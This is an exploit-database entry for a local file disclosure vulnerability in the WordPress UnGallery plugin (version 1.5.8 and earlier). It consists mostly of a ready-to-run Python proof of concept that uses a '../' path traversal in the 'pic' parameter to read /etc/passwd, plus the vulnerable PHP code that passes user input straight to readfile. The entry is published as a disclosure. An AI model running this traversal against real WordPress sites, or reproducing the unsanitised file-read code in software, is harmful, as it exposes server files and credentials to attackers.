[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability
# Published : 2011-08-20
# Author :
# Previous Title : ATutor 2.0.2 Multiple Vulnerabilities
# Next Title : WP E-commerce plugin <= 3.8.4 SQL Injection Exploit
# Exploit Title: WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability
# Date: 2011-08-20
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ungallery.1.5.8.zip
# Version: 1.5.8 (tested)
---
PoC
---
#!/bin/python
import urllib2
FILEPATH = "/etc/passwd"
req = urllib2.urlopen("http://www.site.com/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../../../..%s" % FILEPATH)
print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())
---------------
Vulnerable code
---------------
if ($_GET['pic']) {
$filename = $_GET['pic'];
$len = filesize($filename);
$lastslash = strrpos($filename, "/");
$name = substr($filename, $lastslash + 1);
header("Content-type: image/jpeg;rn");
header("Content-Length: $len;rn");
header("Content-Transfer-Encoding: binary;rn");
header('Content-Disposition: inline; filename="'.$name.'"'); // Render the photo inline.
readfile($filename);
}